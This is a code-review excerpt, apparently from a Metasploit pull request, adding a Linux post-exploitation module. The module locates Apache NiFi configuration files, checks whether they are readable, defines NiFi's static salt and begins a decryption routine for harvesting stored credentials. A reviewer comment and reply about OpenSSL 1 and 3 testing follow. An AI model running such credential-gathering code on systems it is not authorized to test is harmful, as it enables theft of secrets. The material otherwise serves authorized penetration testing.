modules/post/linux/gather/nifi_credentials.rb

```diff
@@ -0,0 +1,298 @@
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('NIFI_PATH', [false, 'NiFi folder', '/opt/nifi/']),
+        OptString.new('NIFI_PROPERTIES', [false, 'NiFi Properties file', '/opt/nifi/conf/nifi.properties']),
+        OptString.new('NIFI_FLOW_JSON', [false, 'NiFi flow.json.gz file', '/opt/nifi/conf/flow.json.gz']),
+        OptString.new('NIFI_IDENTITY', [false, 'NiFi login-identity-providers.xml file', '/opt/nifi/conf/login-identity-providers.xml']),
+        OptString.new('NIFI_AUTHORIZERS', [false, 'NiFi authorizers file', '/opt/nifi/conf/authorizers.xml']),
+        OptInt.new('ITERATIONS', [true, 'Encryption iterations', 160_000])
+      ], self.class
+    )
+  end
+
+  def authorizers_file
+    return @authorizers_file if @authorizers_file
+
+    [datastore['NIFI_authorizers'], "#{datastore['NIFI_PATH']}/conf/authorizers.xml"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found authorizers.xml file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @authorizers_file = f
+    end
+    @authorizers_file
+  end
+
+  def identity_file
+    return @identity_file if @identity_file
+
+    [datastore['NIFI_IDENTITY'], "#{datastore['NIFI_PATH']}/conf/login-identity-providers.xml"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found login-identity-providers.xml file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @identity_file = f
+    end
+    @identity_file
+  end
+
+  def properties_file
+    return @properties_file if @properties_file
+
+    [datastore['NIFI_PROPERTIES'], "#{datastore['NIFI_PATH']}/conf/nifi.properties"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found nifi.properties file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @properties_file = f
+    end
+    @properties_file
+  end
+
+  def flow_file
+    return @flow_file if @flow_file
+
+    [datastore['NIFI_FLOW_JSON'], "#{datastore['NIFI_PATH']}/conf/flow.json.gz"].each do |f|
+      unless file_exist? f
+        vprint_bad("#{f} not found")
+        next
+      end
+      vprint_status("Found flow.json.gz file #{f}")
+      unless readable? f
+        vprint_bad("#{f} not readable")
+        next
+      end
+      print_good("#{f} is readable!")
+      @flow_file = f
+    end
+    @flow_file
+  end
+
+  def salt
+    'NiFi Static Salt'
+  end
+
+  def decrypt(ciphertext, auth_tag, key, nonce)
```

Comment:
To the tester, we should check this module works with openssl1 and openssl3 - sometimes the Ruby wrappers fail on OpenSSL 3 due to internal API changes

Reply:
Tested and working as expected on the following OpenSSL versions:
```
➜  metasploit-framework git:(0ce7b03397) openssl version
OpenSSL 3.1.3 19 Sep 2023 (Library: OpenSSL 3.1.3 19 Sep 2023)
```

```
➜  metasploit-framework git:(0ce7b03397) openssl version
OpenSSL 1.1.1w  11 Sep 2023
```